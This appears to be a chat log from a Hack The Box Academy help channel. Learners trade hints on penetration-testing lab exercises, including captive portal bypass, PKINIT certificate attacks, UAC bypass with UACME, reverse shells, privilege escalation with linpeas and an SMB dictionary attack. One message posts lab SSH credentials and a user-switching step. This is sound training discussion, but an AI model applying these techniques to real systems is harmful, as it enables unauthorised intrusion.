Hi guys. I have 1 question for Bypassing Wi-Fi Captive Portals - Skills Assessment Q4. "Explore the captive portal of "Inlane-Internal-Wifi" and gain access to a restricted endpoint." - what is restricted endpoint? I tried endpoint like admin, restricted - no results. ffuf isn't installed on the attack box. any hints?

Hi guys, is the lab of the module "Pass the Certificate" from the Password Cracking section working ? I have the following error when requesting a TGT with gettgtpkinit.py : Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)" Is it normal ?

yo guys, im on win privesc module, im trying to compile UACME's akagi but its not running as intended, is there any resource for pre-built binaries ?

Hi, on the AI Red Teamer path - has anyone faced the issue where the model upload in the last section of "Application of AI in InfoSec" lead to 0% accuracy, although the model is actually working when tested locally? Are there any specific requirements for the uploaded model to follow?

https://discord.com/channels/473760315293696010/1500033025130364979

https://academy.hackthebox.com/app/module/39/section/407

why...

there might be spaces

Lol, I reloaded the page and now It's passed.
Okay, thinking out of the box, got it..

academy is doing weird rn]

network foundations last task i cannot get it to work, it just wont accept it

anyone had the same problem? or do i overlook anything?

use ftp

it is, no?

try ftp instead of nc

he meant ftp client

well it wants a root pw then

you dont know the pw of the attackbox?

i do

but its not my ftp, no? like the module clearly says i have to use netcat and not ftp and nc works, but just the command simply doesnt work

its my own mashine? the pw is password lol

if thats what you mean

otherwise im confused

you're literally typing [Ctrl+V][Enter][Enter] as text instead of actually pressing those keys

okay im THAT dumb lmao

usually i learned everything thats in the SHELL needs to be typed out

The module wording is confusing/poorly written

yeah

i thought these were real key inputs

so i just type USER anyonymous and press ctrl v before or after sending it?

i cant with this wording, this needs to be rewritten man :(

i think after

okay ill try

hmm okay doesnt work i have another idea

After typing USER anonymous, press Ctrl+V, then Enter, then Enter again.

that's what it is saying to do

yes to go downa line probably

The first Enter (after Ctrl+V) inserts the \r, the second Enter sends the \n and together they make \r\n which FTP requires.

i will type it myself then, because after pressing ctrl+v i just sends it

well the problem is probably i do it in the pwnbox, ill connect myself with my own mashine and try again

the time is up anyway :(

okay on my own mashine it worked first try

thanks you and 0xNX for the help! <3

.ortiz

is enterprise academy slow or is it a problem on my end?

yeah, its slow af today

it's not even loading anything - just blank

its loading, but you need to wait like a minute

I'm talking about normal academy, not enterprise but I guess the infra is shared

using normal academy not enterprise

yeah its cooked rn, both arent working for me

uhhhhh

how do i really drill the fundamentals into my brain

like really hammer it in

repetition and note taking

come back a week later and do it all again but this time just using your notes

okge

Oh thought it was just mine that was incredibly slow

I see in the browser https://academy.hackthebox.com/api/v2/billing/subscription is hitting 404s for me

rippity

Hi,

I need some help with the Hack The Box “Getting Started – Privilege Escalation (Section 11)” lab, specifically Question 2. I would really appreciate if someone could either point me in the right direction or, if possible, explain the full solution so I can understand it properly afterwards.

Here is the task:

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

Hint:
Don't forget to chmod

What I have already done / what works:

I successfully SSHed into the machine as user1:

ssh user1@154.57.164.61 -p 30535
password: password1

From user1, I was able to switch to user2 using sudo:

sudo -u user2 /bin/bash

So I currently have access as user2 on the system.

As user2, I checked:

• sudo privileges (user2 is not in sudoers)
• SUID binaries
• writable files
• cron jobs
• configuration files

However, I could not find any obvious privilege escalation vector.

At this point I am stuck as user2 and unable to escalate to root to read /root/flag.txt.

I would really appreciate either a solution or a clear explanation of the intended method so I can understand the concept properly.

Thank you very much.

is the academy platform slow for you guys ?

Yes

yea i can't spawn targets

uhm, idk what place i can ask for this in, but the new UI for the academy made copying snippets from the sections for note taking very awful, especially when copying text that has like highlights or links. The alignment is bad and there is annoying padding at the beginning and end.

Hello guys l am new to hack the box need help in which tools to use to complete linux fundamental task question on mobile phone

A mobile phone is not a suitable device for completing these tasks.

Thanks for correcting me l appreciate

Good thing I have a pentesting exam tomorrow, academy pretty unusable today

-_-

Good luck bro

I noticed this on Windows too, on Mac its fine

i can not load academy module, wtf

next day is my expired subscription day, wtf ?

in Attacking Common Applications - Skills Assessment II

the last question: Obtain reverse shell access on the target and submit the contents of the flag.txt file.

i managed to get a reverse shell, now do I need to priv esc? to find the flag?

Here to complain about "Setting up" Module.
Im either way out of my league or it's meant to be scrolled thru idk send help

just cat flag bro

doesnt exist broski

i presumed it's in the root dir

ok so let do PE bro

first try with sudo -l or using linpeas 😄

but it's cwes

oh i am doing cwes too, about 80%, maybe i will reach you the next day

but if you use the command to find flag but can not get it, i guess it was hiding or you dont have permission

try PE i think

i dont htink so

mine

i still can not access to the academy 🙁 , i will check it

Is it just me, or the academy is really slow?

No it is

submit the flag and is its hanging ....

be me
play wow for one week straight
Get motivated to study
HTB is loading slow and submitting flag is hanging
Go back to wow
better luck next time

Guys in attacking common services .

• Smb dictionary attack.
  I have the password file and the username, I used nxc for dictionary attack but failed.

do you solve it ?

what I really dislike after the page revamp is that I cannot open an earlier chapter in another tab now

so annyoing